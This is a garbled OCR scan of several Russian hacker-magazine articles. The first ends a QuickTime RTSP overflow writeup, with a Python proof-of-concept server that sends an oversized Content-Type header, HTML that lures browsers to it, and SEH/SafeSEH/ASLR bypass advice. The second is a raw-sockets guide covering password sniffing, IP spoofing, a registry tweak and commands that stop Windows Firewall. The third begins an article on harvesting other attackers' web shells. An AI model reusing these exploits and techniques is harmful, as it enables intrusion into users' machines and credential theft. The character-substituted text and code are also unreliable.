— качественный эксплойт на Си, написанный хакером ІпТеСом. Работа- 
ет на всех системах/браузерах, содержит внятные комментарии и легко 
модифицируемый збеіі-код. 

► 046 



>> Боіиііоп 



На момент публикации статьи никаких заплаток нет, и самое умное, что 
можно сделать, — этозаблокироватьТСР-порт554 на брандмауэре, 
лишившись возможности просмотра потокового ОиіскТіте-контента. Но, 
как говорится, за все в этом мире приходится платить, а за безопасность 
— тем более. Или же просто снести напрочь плагин ОиескТіте, а аудио- и 
видеофайлы проигрывать, например, на тріауег’е или другом внешнем 
проигрывателе (впрочем, поиск проигрывателя без дыр — весьма абс- 
трактная задачка из области фантастики). 

РІЛ.І.0І5СІ.05Е 

Чтобы не блуждать вотьме и не насиловать отладчик, скачаем оригиналь- 
ный эксплойт Кгузііап’а Кіозкоѵѵзкі и присмотримся к нему повниматель- 
нее (напоминаем, что он лежит по адресу Ьир.У/зесигіМосиз.сопп/сІаІа/ 
ѵиІпегаЬІІІ1:іе5/ехрІоіІ5/26549.рѵ ). Большинство вопросов отпадут по ходу 
даже без глубокого знания Питона: 

ОРИГИНАЛЬНЫЙ ЭКСПЛОЙТ ОТ ККѴБТІАМ'А КІ-05К0ѴѴ5КІ 

кгот зоскек ітрогк * 

Ьеасіег = ( 

'КТЗР/ 1.0 200 ОК\г\п ' 

'СЗед: 1 \г\п' 

'Баке: 0 x 00 :Р\г\п' 

' Сопкепк-Вазе : гкзр:// 0 . 0 . 0 . 0 / 1 .шрЗ/\г\п' 

1 Сопкепк-Туре : %з\г\п' # <-- здесь происходит 
переполнение 

' Сопкепк-Ьепдкк : %сІ\г\п' 

\г \п 1 ) 

Ьосіу = ( 

' ѵ= 0 \г\п' 

'о=- 16689332712 1 Ш ІР 4 0 . 0 . 0 . 0 \г\п' 

'з=МРЕС -1 ог 2 АисЗіо, зкгеатесі Ьу кЪ.е РоС 
Ехріоік о.О\г\п' 

' і= 1 .шрЗ \г\п ' 

1 к=0 0\г\п ' 

' а=коо 1 : сіашсіагашсіа\г\п 1 
' а=куре : Ъгоас 1 сазк\г\п 1 
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ктр = "А" * 995 
ктр += "В" * 409 6 

кеасіег %= (ктр, Іеп(Ьосіу) ) # 99 5 символов 
'А' и 409 6 символов 'В' 

еѵіі = Ііеасіег + Ьо<9у # конструируем 

переполненный заголовок 

з = зоскек (АЕ_ШЕТ, ЗОСК_ЗТВЕАМ) 
з . Ьіпсі ( ( " 0 . 0 . 0 . 0 " , 554)) # цепляемся за 

ТСР-порт 554 

з . Іізкеп (1) 

ргіпк " [ + ] Ьізкепіпд оп [КТЗР] 554" 
с, аскіг = з.ассерк() 

ргіпк " [ + ] Соппескіоп ассеркей кгот: %з" 

% ( асісіг [ 0 ] ) 

с . гесѵ ( 1024 ) 
с . зепсі (еѵіі) 

гам_іприк ( " [+] Бопе, ргезз епкег ко 
диік " ) 

с . сіозе ( ) 
з . сіозе ( ) 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ) 



СпвцналыШв- пре дложснме: 

ТРПРгЛПН ИНТЕРНЕТ 

I иЛЬФуЛ Л 00 < ГИ&ЧЕНН Е БССПИДТНО 

* Гк-дип ючо-кмо — □ любом м о с т & 

Маскам и Моско-пскоіі дбл. 

* Сппн. па Д к П ю ч г ни й Ь Мастит* - 14 Дкй-й. 

И М □ С К й п г_к он обл. - ОТ 14 ДО 3=6 ДЙІОИ.. 

- Ус І-п мамки- адаскоііск^а ІойсфаннаГср намсрл 

» Мчѵетокагіолізныо т&пе-ф очные номера 

- I Р ■ тс-лс ф □ Н И И 
■ Вьгдс.ітгнн ы г Л нн МИ ИнТерн-еІ 
* «орлорлі Иіічые чцртн^ьр сити (ѴРЫ) 

- Кастинг, услуги ба С л -центра 



Мы видим, что эксплойт представляет собой потоковый трЗ-по- 
добный сервер в миниатюре (точнее, его имитацию), генериру- 
ющий ПТ5Р-пакеты с«дикими»заголовками, поле Сопіепі-Туре 
которых собирается следующим образом: «[А * 995] + [В * 4096]\г\ 
п», то есть содержит 995 символов 'А', за которыми следуют 4096 
символов 'В’. Это, чтобы если и переполнять, то наверняка! 

О к, запускаем эксплойт на выполнение — и ничего не проис- 
ходит! Правильно! Ведь мы только открыли порт и стали его 



РЛ7 Телеком 
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слушать, ожидая подбросить первому встречному пакет-убийцу, но вот 
что-то никаких встречных на нашей улице не наблюдается, и, чтобы их 
заманить, необходимо создать НТМБ-файл с внедренным потоковым 
объектом. Огромное количество примеров реализации содержится 
на бирѴ/диіскІіте.Іс.соІитЬіа.есІи/изегз/ітІ/тоѵіез/тІевІ.бІтІ . Вот, 
например, один из них (естественно, адрес диіскІіте.Іс.соІитЬіа.есІи 
должен быть заменен нашим локальным адресом или адресом того 
сервера, на котором выложен эксплойт): 



ПРИМЕР ВНЕДРЕНИЯ ПОТОКОВОГО ОБЪЕКТА В НТМЬКОД 

<зсгірЪ згс= " /з аѵазсгірЦ/АС_ОиіскТіше . з з " 1апдиаде= 

" ЦаѵаЗсгірк "куре= " кехк / | аѵазсгірД " > 

</зсгірЦ> 

<зсгірр 1апдиаде= " ЦаѵаЗсгірЦ " куре= " кехк/ д аѵазсгірр " > 
0Т_МгіРеОВЦЕСТ ( 1 гДзр : / /диіскРіше . кс . соІишЬіа . 
есіи: 554//тоѵіез/зіхкіез .тоѵ' , , 320 , , , 256 , , ,, / 

' аикоріау', 1 каізе'); 

</зсгірк> 



А вотУад Кобба в своем эксплойте пошел другим путем, ключевой фраг- 
мент которого приводится ниже: 



ВНЕДРЕНИЕ ПОТОКОВОГО ОБЪЕКТА В НТМЬКОД 
ПО МЕТОДУ УАО'А КОННА 

сіоситепк .ѵлгіке ( 1 <оЪдеск СЬА38ІБ= "сізісі: 02ВР25Б5-8С17- 
4В23-ВС80-В3488АВВВС6В" 

ѵ7ІсНс1і="0" Ъ.еід1тк = " 0 " зку1е= "ЬогсЗег : Орх" > 

<рагаш паше="згс" ѵа1ие=" . /ріауіізк .тоѵ"> 

<рагат пате= " аикоріау " ѵа1ие=" Ргие"> 

<рагат пате= " Іоор" ѵа1ие= " баізе" > 

<рагат пате= " сопкгоііег " ѵа!ие= " Вгие" ></оЬз еск> 1 ) ; 



Открываем сгенерированный НТМЬ в браузере, кликаем по ссылке 
на трЗ-файл (якобы трЗ) — и браузертутже падает, позволяя нам 



а 



проанализировать содержимое регистров (для этого в системе должен 
быть предварительно установлен ЗизЫп-Тіппе-отладчик, например, 
ОНуОеЬиддег]. 

414141416 (АЗСІІ-коды символов ‘А’) указывают на следующую 5ЕН- 
гесогсі (запись для обработки структурных исключений), а 424242426 
затирают 5ЕН- 6а псііег, что позволяет реализовать классическую пере- 
дачу управления через подмену 5ЕН-обработчика. Воттолько работать 
это будет лишь на ѴѴ2К, ноникакненаХР5Р2, поскольку там реализован 
защитный механизм, именуемый 5абе5 Е Н , препятствующий передаче 
управления на код, расположенный в стеке. Ну на самом деле это не 
такая уж большая проблема. В секции кода одной из динамических биб- 
лиотек можно найти команду ЗМР Е5Р, соответствующую опкоду ЕЕб Е46, 
который с высокой степенью вероятности встретится в памяти и сделает 
нам «пас», чего система даже не заподозрит. Правда, это не слишком 
надежно и совсем не универсально, ведь положение машинных команд 
варьируется от одной версии системы к другой и зависит еще и от типа и 
версии браузера. А на Висте, с учетом механизма рандомизации адрес- 
ного пространства (А5ЕР — АсИгезз Зрасе Еауоиі РапботІ 2 а 1 іоп),ивов- 
сетруба, поскольку стартовые адреса библиотек выбираются случайным 
образом из 256 возможных вариантов, и шансы на успешную атаку тают 
прямо на глазах. Конечно, если долго мучиться, что-нибудь получится, 
то есть ожидаемая комбинация когда-нибудь да выпадет, особенно если 
мы не атакуем конкретную жертву, а устраиваем тотальную бомбежку в 
надежде создать очередной ботнет. 

Однако, на наше счастье, модули, входящие в состав ОиіскТіте Ріауег'а 
(а именно модули с расширением діх), не используют ни рандомизацию 
(по соображениям производительности), ни Заію-ЗЕН (совершенно не- 
понятно, по каким соображениям), поэтому атака из труднореализуемой 
становится совершенно тривиальной. 

Достаточно передать управление куда-то внутрь одного из діх- моду- 
лей, и все, что нам нужно, — это учитывать версию самого ОиіскТІ те 
Ріауег’а, которых на данный момент в широком использовании всего 
две: 7.2 и 7.3. Единственная проблема, с которой приходится сталки- 
ваться хакерам (и которая сбивает с толку многих начинающих), — это 
принудительная фильтрация символов поля Сопіепі-Туре, приводящая 
к невозможности использования большого количества машинных 
команд в вбеіі-коде. В частности, символы 4В6 (ОЕС ЕВХ), 596 (РОР 
ЕСХ) 796 Р N5 XXX) отметаются парсером как неверные. К тому же эти 
бех-коды могут быть и частью других машинных команд. Что делать? 
Очень просто — шифровать! Основноетело вбеіі-кода зашифровано 
таким образом, что «запрещенные» символы в нем не встречаются, а в 
качестве расшифровщика используется тривиальный цикл с ХОР, ко- 
торый легко написать даже с учетом всех правил фильтрации, которые 
только есть. 

Таким образом, атака на Арріе ОиіскТіте — это реальность, рискующая 
в любую секунду обернуться глобальной техногенной катастрофой, по- 
ражающей все системы без разбора. Боевые эксплойты уже написаны и 
выложены в публичный доступ, а дырка до сих пор не закрыта! В общем, 
ситуация просто взрывоопасная, ц-е 



«ОДНАКО, НА НАШЕ СЧАСТЬЕ, МОДУЛИ, ВХОДЯЩИЕ В СОСТАВ 
ОШСКТІМЕ РЬАУЕК’А (А ИМЕННО МОДУЛИ С РАСШИРЕНИЕМ ОТХ), 
НЕ ИСПОЛЬЗУЮТ НИ РАНДОМИЗАЦИЮ, НИ 5АРЕ-5ЕН, ПОЭТОМУ 
АТАКА ИЗ ТРУДНОРЕАЛИЗУЕМОЙ СТАНОВИТСЯ СОВЕРШЕННО 
ТРИВИАЛЬНОЙ» 
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Инновационные решение в борьбе с международным терроризмом 

"Электронно» государство": вопросы безопасности электронных услуг 



Интеллектуальное собственность а Экономике Российской Федерации 
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СЫРОСТЬ 



КРИС КАСПЕРСКИ 



НЕ РАДОСТЬ 



РЕАЛИЗАЦИЯ СЫРЫХ СОКЕТОВ В ѴѴШИТ 



Сырые сокеты (га\ѵ зоскегз) широко используются как в хакерских, так и в легальных 
коммерческих программах: эксплойтах, спуферах, сниферах, сканерах, брандмауэрах, 
ЫАТ’ах, еіс. Никсы поддерживают сырые сокеты изначально, 9х — лишь формально. 

С выходом ѴѴ2К МІСГ050ІТ подарила нам полноценную поддержку сырых сокетов, но начи- 
ная с ХР ЗР2 сурово урезала их функциональность, в результате чего многие системные 
программы перестали работать. Чтобы вернуть былую функциональность, программис- 
там пришлось опуститься на уровень ядра или заюзать библиотеку ѴѴіпСар. А что делать 
простым пользователям? Как оживить старые программы, не имея исходных текстов на 
руках? Без паники! Сейчас я все расскажу. 



океты представляют собой индустриальный стандарт уни- 
фицированного интерфейса, ориентированный на межпро- 
цессорное взаимодействие и поддерживаемый практически 
всеми операционными системами. Причем сокету все равно, 
где находится соседний процесс — на локальной машине или на другом 
конце света (тьмы). В общем случае сокет представляетсобой комбинацию 



ІР-адреса и порта (например: 192.168.6.9:25), атакже набор функций для 
установки соединения и обмена данными. 

Обычные сокеты — явные приверженцы парадигмы ООП и позволяют 
взаимодействовать с заголовками пакетов только путем вызова соот- 
ветствующих АРІ-функций. Мы можем задавать целевой адрес и порт 
назначения (а при желании и локальный порт), устанавливать некоторые 
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флаги типа ТТ І_ (Тіте То Ьіѵе — время жизни) или Т05 (Туре о! Бегѵісе — тип 
сервиса). Остальныеже поля (например, поле контрольной суммы или 
флагфрагментации) операционная система заполняет самостоятельно. 
Программистлишен права вмешиваться в этоттонкий процесс. Впрочем, 
большинству прикладных протоколов (Р0РЗ/5МТР/НТТР) обозначенных 
возможностей вполне достаточно, и программистам жаловаться не прихо- 
дится. Ахакерам? 

Сырые сокеты выгодно отличаются тем, что позволяют собиратьТСР/ 
ІР-пакеты, вручную контролируя каждый бит заголовка и отправляя в 
сеть нестандартные пакеты, к приему которых операционная система 
ни морально, ни физически не готова. Хакер может намертво повесить 
целевой компьютер, забросить зловредный зЬеІІ-код, обойти брандмауэр, 
незаметно просканировать порты, отправить пакет от чужого имени и много 
чего еще! 

Во времена рассвета Винды 9х, поддерживающей сырые сокеты лишь 
на уровне ІСМР, хакеры вовсю ставили Ыпих/ВВОтолько длятого, чтобы 
получить полноценный доступ ксырым сокетам. Эти системы превраща- 
ли хакеров в богов, контролирующих обширные сетевыетерритории и 
скрывающихся за поддельными ІР-адресами. И хотя основные ошибки в 
ТСР/ІР-стекеза последнее десятилетие были исправлены, внедрение но- 
вомодного (а значит, ни фига не протестированного) ІРѵб вкупе с полностью 
переписанным сетевым стеком в Висте спровоцировало всплеск интереса 
катакам старого типа. 

Полноценная поддержка сырых сокетов в ѴѴ2К вызвала настоящий фурор! 
Программисты перенесли многие хакерские программы (типа птар) в 
ѴѴІпсІоѵѵв, и необходимость ставить никсы просто отпала. По Сети прокати- 
лась волна атак. Сырые сокеты использовали нетолько хакеры, но и черви 
(например, червь ЭіитЫег), в результате чего в ХР функциональность 
сырых сокетов была существенноурезана. ВХР5Р2 наступил сплошной 
ахтунг, а ХР 5Р2 с заплаткой М505-01 9 — это уже не ахтунг, а просто мер- 
зость какая-то с кучей блокировок на уровне ядра, которые с прикладного 
уровня просто так не обойдешь. 

Как следствие, программы, нуждающиеся в сырых сокетах, с переходом на 
ХР5Р2 перестали работать вообще, и их разработчикам пришлось искать 
обходные пути для возвращения утраченной функциональности (например, 
патчить сетевые драйверы или работать напрямую с N015). Ксожалению, 
далеко не все разработчики удосужились обновить свои программы, осо- 
бенно если они распространялись вузком кругу на бесплатной основе. 
Отсутствие поддержки сырых сокетов никак неувеличивает защищенность 
ѴѴІпсІоѵѵв, хотя и не позволяет использовать ее в качестве плацдарма для 
атак на другие системы (точнее, затрудняет атаку в несколько раз). Но ведь 
на дворе не 1 995 год! Воздвигнуть Ыпих/ВБО на виртуальной машине 
сегодня может даже начинающий хакер, да и способы обхода ограничений 
сырых сокетовтоже имеются. В ассортименте. 

Настоящая статья главным образом ориентирована на пользователей, 
работающих с чужими программами и не имеющих возможности (времени, 
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птар — одна из многих программ, нуждающихся в сырых сокетах 



желания) дорабатывать их исходный код. Какзаставить старые программы 
работать на новых системах? Вот в чем вопрос! Мы рассмотрим все имею- 
щиеся на данный моментоси (вплотьдо Висты и 5егѵег2008 включитель- 
но), демонстрируя различные пути обхода наложенных ограничений. 

Н В ХЛЮПАЮЩЕЙ ГРЯЗИ ЗЛОВОННЫХ БОЛОТ М$ 

Сырые сокеты делятся на две категории: первые знают номер протокола, 
с которым они работают (например, ІСМР); вторые же принимают пакеты 
всех протоколов независимо отномера, прописанного в ихзаголовке. 
Достаточно часто встречается утверждение, что при попытке открыть 
сырой сокет вызовом АРІ-функций воскеі/ѴѴБАвоскеІ: со вторым парамет- 
ром 50СК_РАѴѴ (іуре) и с нулевым третьим параметром (ргоіосоі) такой 
сокеттебе откроется — не вопрос. Однако при попытке сделать зепейо или 
геЫгот ядро скажеттебе, что ты болван. Ну конечноже оно сделает это 
не так прямолинейно: мол, твой системный вызов прерван, а правильный 
вариант выглядит так: 50скеі(АР_ІЫЕТ, 50СК_РАѴѴ, ІРРР0Т0_ІР). 

Базару нет, вариант действительно правильный, однако, поскольку макрос 
I РРР0Т0_1 Р равен нулю, воске1:(АБ_ІІ\ІЕТ, 50СК_РАѴѴ, 0) будет работать 
ничуть не хуже. Кстати, АР_І N ЕТ можно смело заменить РР_І N ЕТ — суть 
дела отэтого не изменится. А вотс остальными типами протоколов надо 
разобраться. Параметр ІРРПОТСИРтождественен ІРРП0Т0_ПАѴѴ — в обоих 
случаях мы принимаем все ІР-пакеты целиком вместе с ІР-заголовками 
независимо оттого, была ли установлена опция/ІР_ЕЮРІІ\ІСЕ или нет. 
Параметр ІРРРОТСИСМР распространяется только на ІСМР-сообщения, 
однако, если к сокету была применена операция 5І0_РСѴАЕЕ, протокол 
нивелируется и ловит все пакеты без разбора, обеспечивая тот же самый 
эффект, что и ІРРРОТСИ Р/ІРРР0Т0_ПАѴѴ (по крайней мере, в текущих 
версиях ѴѴІпсІоѵѵв дело обстоит именно так). Параметр 1РРР0Т0_1ЮР 
в этом случае не ловит никаких пакетов вообще, но конкретно срывает 
крышу персональным брандмауэрам, многие из которых отображают 
большое количество блокируемого ІЮР-трафика, но на самом деле не 
блокируютего, а спокойно доставляют пакеты до целевого приложения. 
То есть все работает нормально, только брандмауэр ругается. Неплохая 
шутка для администраторов :). 

Параметр 1РРВ0Т0_ТСР вызывает ошибку при обращении к функции ЬіпсІ, 
та к что с ТС Р выходит полный облом. Но если кто здесь и болван, та к это 
ядро, но не никакя. 

Когда для сырого сокета задан локальный ІР-адрес, он должен соответст- 
вовать целевому ІР-адресу входящего пакета, прописанного в ІР-заголовке 
(задатьлокальный ІР-адрес можно АРІ-функцией ЬіпсІ). Еслиже сырой 



ХАКЕР 01 /109/ 08 



► 051 






взлом 



\ \ \ \ 

со\т не сопостХлен н\: какі\> локальным адресом, пакет копируется в 
^кет не||авис^іо оттого, кому он адресован. Копируется в том смысле, что 
сырой^сокет\іе пожирает проходящие через интерфейс пакеты, а снимает 
с них кот ии, какбы превращаясь в пассивный снифер, не нарушающий 
работу остальных приложений. «Ретранслировать» пакеты не нужно — они 
и сами дойдут до приложения-получателя. 

При этом неоходимо быть готовым к приему большого количества левых 
пакетов, совершенно нам непредназначенных, что особенно актуально 
для локальных сетей или 051-подключения с криво настроенным провай- 
дерским маршрутизатором. Забавно, но при этом часто удается выудить 
довольно интересную информацию, например незашифрованные пароли 
к некоторым сайтам или почтовым ящикам. Причем обнаружить факт 
снифинга подобного рода совершенно невозможно (мы просто собираем 
все пакеты, физически проходящие через нашу машину, что же в этом 
незаконного?). 

Если для сырого сокета задан Іогеідп-адрес (удаленный ІР-адрес), он будет 
л овить только ІР-пакеты, приходящие с заданного узла, то есть пакеты, 
чей зоигсе-адрес равен установленному (задать Іогеідп -адрес можно с 
помощью АРІ-функции соппесі;). Особого смысла в этом нет, ну разве что 
если мы хотим ограничить сбортрафика каким-то конкретным узлом. Если 
же Іогеідп-адрес не установлен, в сырой сокет копируются все пакеты неза- 
висимо от адреса -источника. 

Каквариант— грабеж проходящего мимотрафика можно осуществить с 
помощьюустановки ІОСТЕ-параметра 5І0_РСѴАЕЕ путем вызова функции 
ѴѴЗАІосП, главными недостатками которой является невозможность рабо- 
тать с протоколами, отличными от I РРР0Т0_1 Р, и необходимость привязки 
сокета на конкретный интерфейс. То есть если у нас обозначена сетевая 
карта локальной сети, 05Е- и 6РП5-модем, то АРІ-функцию ЬіпсІ придется 
вызывать трижды, каждый раз делая это в отдельном потоке (на блокиру- 
емых сокетах). Попытка привязки клюбому адресу (1МА00Р_АЫУ) ведет к 
провалу. Ктомуже флаг5І0_ПСѴАІ_І_ поддерживается только начиная с ѴѴ2К 
и в N1 не работает. В общем, решай сам, иметь или не иметь. Междутем 
существуют и другие ІОСТІ_-команды, полезные для грабежа: 5І0_РСѴАІ_І__ 
МСА5Т получает весь тиШсаз! ІР-трафик (при этом тип протокола должен 
быть установлен в 1РРР0Т0_1ЮР), а 5Ю_РСѴАЕЕ_І6МРМСА5Т, соответс- 
твенно, грабит весь І6МР тиШсазІ ІР-трафик (при этом тип протокола 
должен быть установлен в РРРОТСИѲМР). 

Простейший ІР-снифер я выложил на наш Р\Ю, прилагаемый кжурналу. 

Но это все, что касается сырых сокетов, принимающих пакеты. В полной 
мере их функциональность впервые была реализована в ѴѴ2Ки с тех пор 
не претерпела никаких существенных изменений. Судьба сырых сокетов, 
передающих пакеты, намного более печальна. ЫТ не позволяет создавать 
больше 1 0 ТС Р-соеди нений за 1 0 минут, хотя при желании это значение 
можноувеличить, покопавшись в реестре. 

В ѴѴ2К сырые сокеты поддерживаются без каких бы то ни было ограни- 
чений, однако, отправляя ІР-пакет с чужим ІР, мы рискуем нарваться на 
кучу неприятностей. Неправильный пакет может зарезать как наш собс- 
твенный персональный брандмауэр, так и ЫАТ, встроенный в Р5Е-мо- 
дем. Даже если пакет благополучно покинет хакерский компьютер, его 
наверняка прибьет первый же маршрутизатор провайдера. Так что мало 
научиться создавать сырые сокеты с поддельными ІР-адресами, хакеру 
еще необходимо найти провайдера (вот потому у одних поддельные ІР 



От юзера до админа 

По умолчанию сырые сокеты доступны только из-под учетной записи 
администратора, что не есть хорошо, однако любые ограничения 
можно обойти. Чтобы сырые сокеты заработали и на пользователь- 
ском уровне, достаточно открыть следующую ветвь системного 
реестра: НКЬМ\5у5іет\СиггепіСопіго15еЛ$егѵісе5\АІеІ\Рагатеі:ег5, 
найти там параметр ПізаЫеКашЗесигйу типа ПѴЮКХ) (если такого 
параметра нет, создать его) , присвоить ему значение 1, после чего 
перезагрузиться. Все — теперь сырые сокеты доступны всем! 




работают, а у других нет). В локальной сети (во всяком случае, в пределах 
одного сегмента) подобных проблем не возникает и все работает на 
ура. Впрочем, подделка ІР не главная функция сырых сокетов, и обычно 
хакеры используют их для создания битых ТСР/ІР-пакетов с диким набо- 
ром флагов, который целевая операционная система не переваривает, 
передавая управление на збеЕ-код. 

В ХР 5Р0 функциональность сырых сокетов в плане отправки данных су- 
щественно ограничена, и они жестоко фильтруются персональным бран- 
дмауэром ака ѴѴІпсіоѵѵб ЕігеѵѵаЕ, который, впрочем, легко остановить 
командой пеі зіор збагесІассеББ, после чего все проблемы исчезают. 

ХР 5Р1 (с установленной заплаткой безопасности М 505-01 9) блокирует 
сырые сокеты, если брандмауэр не запущен! Политика запретов продол- 
жила набирать обороты и в ХР 5Р2, из которой исчезли сырые ТСР-со- 
кеты, и хакеры оказались вынуждены вручную собирать ТС Р- па кеты из 
ІР или использовать протоколы ІСМР и/или ІЮР. В Висте от всего этого 
богатства остался всего лишь один ІСМР, что вплотную приблизило ее 
к 9х (правда, ходят слухи, что поддержку сырых ІР и ІЮР Висте очень 
скоро вернут). 

Короче, вХР5Р2 мы имеем следующий перечень ограничений (подробнее 
смотри тут — Ьир:/ЛесЬпеЕтісгоБОЙ.сот/еп-и5/[ІЬгагѵ/ЬЬ4571 бб.азрх ): 



Вокруг М5 о5-оі9 

Заплатка М505-019 представляет собой обновление безопасности, 
затыкающее критическую дыру в ТСР/ІР-стеке путем замещения 
драйверов абсІ.зуБ, Гсрір.зуБ и гфі.зуз, атакже некоторых динамических 
библиотек (подробнее об этом можно прочитать на ѵуѵуѵу.гпісгобоЙ. 
сотЛесйпеі/БесигЦу/Ьи11ейп/т505-019.т5рх) . 

Отказ от использования заплатки М505-019 теоретически возможен, 
но практически крайне нежелателен, поскольку, поймав определен- 
ным образом сконструированный ІР-пакет, атакованный компьютер 
начнет исполнять зловредный зЬеІІ-код на уровне ядра или (что более 
вероятно) уйдет в голубой экран. Впрочем, существует возможность 
заблокировать незапрошенный ІР-трафик на брандмауэре (ѴѴіпсіоѵуб 
Рігеѵуаіі умеет делать это) , однако тогда перестанут работать и многие 
легальные программы. С другой стороны, установка М505-019 про- 
ходит весьма болезненно, порождая огромное количество проблем 
(неполный список которых лежит на Ьнр://5иррогі.тісгоБОІТ.сот/ 
кЪ/897656) . и потому хакерам настоятельно рекомендуется снести 
ее напрочь, а трафиком рулить посредством брандмауэра. Напри- 
мер, ОтрозРта, для которого можно написать специальный плагин, 
распознающий зловредные ІР-пакеты и дропающий их. Наградой за это 
станет «реабилитация» сырых сокетов. 
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Архитектура сокетов в\/Ѵ2Ки более старших системах 



Схема взаимодействия приложений с ядром 
через сокеты 



1 . ТС Р- па кеты не могут быть посланы через сырые сокеты. 

2. ІЮР-пакеты елевым адресом источника дропаются системой. 

Зегѵег 2003 и Зегѵег 2008 полностью поддерживают сырые сокеты, но 
только после остановки встроенного брандмауэра, что осуществляется 
командой пеі віор а Ід, причем касательно 5егѵег2008 информация пока 
неполная, противоречивая и может измениться в любую минуту. В общем, 
держи лапы на пульсе, в смысле на клавиатуре. 

Таким образом, для хакинга идеально подходит ѴѴ2К или (с некоторой 
натяжкой) Зегѵег 2003/2008. А что делать тем, у кого установлена ХР/Виста и 
кто слезать с нее ни за что не собирается даже ради хакерства и крутизны? 

В СЫРЫЕ СОКЕТЫ НАХР5Р2/ВИСТЕ 

Используя ХР 5Р2/Висту, будь готов ктому, что многие атакующие про- 
граммы откажутся работать. Ну с подделкой ІР-адреса никаких вопросов 
не возникает. Достаточно завести себе интерфейс с ІР-адресом, который 
мы хотим подделывать, и система благополучно пропустит его наружу. 

А вот с остальными ограничениями бороться сложнее. Разработчики 
коммерческих утилит (сканеров безопасности, например) матерясь 
опускаются с прикладного уровня на уровень ядра, создавая специаль- 
ный драйвер-отмычку. 

Штатный драйвер ТСРІР.5Ѵ5 создает несколько устройств: ТС Р, ІЮР и 
РАѴѴІР. Причем РАѴѴІР потребовался для обслуживания своего же собс- 
твенного ЫАТ'а, впервые появившегося в ѴѴ2К. ЫАТ есть ЫАТ, и ему позарез 
необходимо слать пакеты от имени внешних узлов, обеспечивая прозрач- 
ную трансляцию адресов. Грубо говоря, МАТ — это легальный ІР-спуфер, 
встроенный в систему, и грех не упасть ему на хвост. 

Хакерский драйвер должен открыть доступ кустройству \Оеѵісе\РаѵѵІр, 
назначить ему атрибут ІРНОН_ІМСЦ после чего можно слать все что угод- 
но и от кого угодно. А чтобы псевдоустройство было видно с прикладного 
уровня, достаточно вызывать АРІ-функцию ВейпеОозОеѵісе, и это будет 
работать на любой системе, причем поиском правильного интерфейса 
для отправки пакета займется непосредственно сам драйвер ТСРІР.5У5 
и нам не придется с этим заморачиваться. Способ универсальный, но без 
драйвера тут не обойтись. Коммерческие программисты даже не крякнут, 
но вотавторы разных эксплойтов и других бесплатных атакующих утилит 



> СІѴСІ 

На диске ищи пол- 
ный вариант статьи, 
а также исходник 
моего снифера, ис- 
пользующего сырые 
сокеты. 



просто забили на ХР 5Р2 и перешли на никсы 
или вернулись обратно в ѴѴ2К, что вызвало 
огромное недовольство простых смертных. 

Им -то сносить свою любимую ХР/Висту ох 
как не хочется! Лучше уж якорь в задницу! 

Но что мешает установить ѴМѵѵаге и 
натянуть поверх ХР любую другую систему, 

например ѴѴ2 К, Ыпих или ВЗй? Однако без тонкостей и здесь не 
обходится. Чтобы этот «бутерброд» заработал, необходимо обеспе- 
чить физический доступ виртуальной машины к сетевой карте (если 
используется ВНегпеШинтернет), ІІ5В-порту, в который воткнут 
050- модем, или СОМ -порту с диалап-модемом. Все это осуществля- 
ется легальными средствами самой ѴМѵѵаге и не вызывает никаких 
проблем. 

Заходим в свойства виртуальной машины (Ебіі ѵіНиаІ тасЫпе зеШпдз), 
находим там сетевую карту и говорим «Вгібдеі: соппесі бігеейуіо рбузісаі 
пеіѵѵогк», после чего гостевая операционная система подключается пря- 
миком к виртуальному адаптеру. Чтобы пакеты уходили с базовой машины в 
сеть, еще надо настроить маршрутизацию пакетов штатной командой гоиіе. 
Это может отпугнуть начинающих, и на первых порахлучше использовать 
й5І_-модемы на 115В. 

По умолчанию ѴМѵѵаге видит все 115 В -устройства, так что никаких 
проблем тут не возникает, а вот СОМ-модемы уже требуется сконфигу- 
рировать вручную. Возвращаемся к Ебіі ѵігіиаі тасЫпе зеШпдз, жмем 
Абб, находим в списке устройств последовательный порт (зегіаі рогі) и 
говорим «ІІзе рбузісаі зегіаі рогі оп Ліе Нозі», после чего модем увидит- 
ся гостевой осью как родной, и нам останется только войти в интернет. 
Аналогичным образом обстоят дела и с сотовыми телефонами: подклю- 
чаемихлибо через СО М/115 В- шнурок, либо через ИК/ВІие1ооіЬ-порт с 
адаптером, воткнутым в С0М/ІІ5В. Тут, правда, необходимо отметить, 
что мне неизвестны сотовые операторы, поддерживающие сырые соке- 
ты. В том смысле, что пакеты все равно пересобираются на ближайшем 
же узле, и все наши хитрые манипуляции с заголовками идут лесом. 

Как вариант — можно загрузиться в ЫѵеСО (типа КЫОРРІХ) и юзать сырые 
сокеты уже через него. В общем, возможных решений много. И какие 
бы препятствия нам ни городил МісгоВоЙ, мы — хакеры — все равно их 
обойдем! 



Нажми на газ! 

Сырые ТСР/ГОР-сокеты работают намного медленнее обычных 
(что особенно хорошо заметно при открытии большого количества 
соединений или интенсивном трафике), а потому применять их 
следует только тогда, когда стандартными средствами поставленная 
задача не решается. 



В ЗАКЛЮЧЕНИЕ 

МісгозоЛ (и куча сетевых обозревателей, включая вроде бы неглупо- 
го мужика Стива Гибсона — ѵѵѵѵѵѵ.дгс.сот/боз/іпІго.Ыт ) расценивает 
сырые сокеты исключительно как орудие зла и в стремлении защитить 
мир от вандалов планомерно щемит функциональность, забывая отом, 
что сырые сокеты — это еще и превосходное средство обучения. Только 
конструируя ТСР/ІР-пакеты своим руками, можно постичь истинное дао, 
на котором держится весь интернет, и нам остается только радоваться, 
что сырые сокеты по-прежнему с нами! цц 
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По горячим 
следам 



БЕРЕМ СЛЕД ХАКЕРА С ЦЕЛЬЮ СОБСТВЕННОЙ НАЖИВЫ 



В последнее время нередки случаи повторных взломов одних и тех же ресурсов. Это 
неудивительно: большинство уязвимостей общеизвестно, а их эксплуатация напрямую 
зависит от прямых рук атакующего. В сложившейся ситуации отлично чувствуют себя те, 
кто сумел приспособиться к такому порядку вещей, умело находя следы чужой работы. 
Ведь как приятно получить с десяток веб-шеллов в течение часа, приложив минимум уси- 
лий! С другой стороны, всегда интересно наблюдать за работой таких же, как и ты, тихо и 
незаметно перенимая опыт коллег по цеху. Поверь, зачастую не нужно изобретать вело- 
сипед, достаточно лишь грамотно использовать плоды чужого труда. Как это сделать? 
Сейчас разберемся. 



В БЕРЕМ СЛЕД 

Итак, представь, что тебе необходимо заполучить достаточно большое 
количество веб-шеллов. Причем желательно разносерверное распо- 
ложение каждого из них (то есть один веб-шелл на одном сервере). В 
таком случае рутать бажного хостера и заливать в пользовательские 
